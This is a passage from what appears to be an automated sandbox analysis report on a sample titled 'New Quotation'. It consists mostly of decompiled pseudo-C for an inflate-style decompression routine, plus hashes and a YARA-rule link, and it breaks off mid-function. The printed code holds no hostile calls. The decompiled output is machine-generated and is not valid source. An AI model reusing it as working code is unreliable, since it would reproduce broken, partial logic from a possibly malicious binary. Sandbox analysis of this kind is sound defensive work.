                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                          • Opcode ID: 2616af6840be9ad065c7271e10669628003eadbae38ac98b1b8d582da80c65e5
                                                                                                                                                                                          • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2616af6840be9ad065c7271e10669628003eadbae38ac98b1b8d582da80c65e5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406D85 Relevance: .3, Instructions: 334COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E00406D85(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004074F4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4084d4; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4084d4; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x432e90;
												if( *0x432e90 != 0) {
													L22:
													_t412 =  *0x40a5e8; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a5ec; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x431d0c; // 0x432610
													_t446[5] = _t414;
													_t415 =  *0x431d08; // 0x432e10
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x431d10;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x432190;
													if(_t416 < 0x432190) {
														L15:
														__eflags = _t416 - 0x431f4c;
														_t438 = 8;
														if(_t416 > 0x431f4c) {
															__eflags = _t416 - 0x432110;
															if(_t416 >= 0x432110) {
																__eflags = _t416 - 0x432170;
																if(_t416 < 0x432170) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x431d10, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x431d10 + _t440;
														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
														 *0x432e90 =  *0x432e90 + 1;
														__eflags =  *0x432e90;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
